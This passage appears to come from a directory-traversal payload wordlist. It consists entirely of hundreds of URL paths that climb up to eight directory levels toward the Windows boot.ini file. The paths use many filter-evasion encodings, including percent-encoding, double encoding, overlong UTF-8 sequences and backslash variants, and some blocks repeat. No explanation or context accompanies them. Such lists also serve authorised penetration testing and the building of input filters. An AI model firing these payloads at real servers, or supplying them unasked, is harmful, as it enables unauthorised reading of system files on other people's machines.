-/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%252e%252e\boot.ini -/%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/..%c0%afboot.ini -/..%c0%af..%c0%afboot.ini -/..%c0%af..%c0%af..%c0%afboot.ini -/..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -/%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -/..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -/%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -/..%c1%9cboot.ini -/..%c1%9c..%c1%9cboot.ini -/..%c1%9c..%c1%9c..%c1%9cboot.ini -/..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -/%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -/%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -/..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -/%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -/..%%32%66boot.ini -/..%%32%66..%%32%66boot.ini -/..%%32%66..%%32%66..%%32%66boot.ini -/..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -/..%%35%63boot.ini -/..%%35%63..%%35%63boot.ini -/..%%35%63..%%35%63..%%35%63boot.ini -/..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -/%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -/../boot.ini -/../../boot.ini -/../../../boot.ini -/../../../../boot.ini -/../../../../../boot.ini -/../../../../../../boot.ini -/../../../../../../../boot.ini -/../../../../../../../../boot.ini -/..%2fboot.ini -/..%2f..%2fboot.ini -/..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/%2e%2e/boot.ini -/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/..%252fboot.ini -/..%252f..%252fboot.ini -/..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/%252e%252e/boot.ini -/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/..\boot.ini -/..\..\boot.ini -/..\..\..\boot.ini -/..\..\..\..\boot.ini -/..\..\..\..\..\boot.ini -/..\..\..\..\..\..\boot.ini -/..\..\..\..\..\..\..\boot.ini -/..\..\..\..\..\..\..\..\boot.ini -/..%5cboot.ini -/..%5c..%5cboot.ini -/..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/%2e%2e\boot.ini -/%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/..%255cboot.ini -/..%255c..%255cboot.ini -/..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/%252e%252e\boot.ini -/%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -/%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -/../boot.ini -/../../boot.ini -/../../../boot.ini -/../../../../boot.ini -/../../../../../boot.ini -/../../../../../../boot.ini -/../../../../../../../boot.ini -/../../../../../../../../boot.ini -/..%2fboot.ini -/..%2f..%2fboot.ini -/..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/%2e%2e/boot.ini -/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini 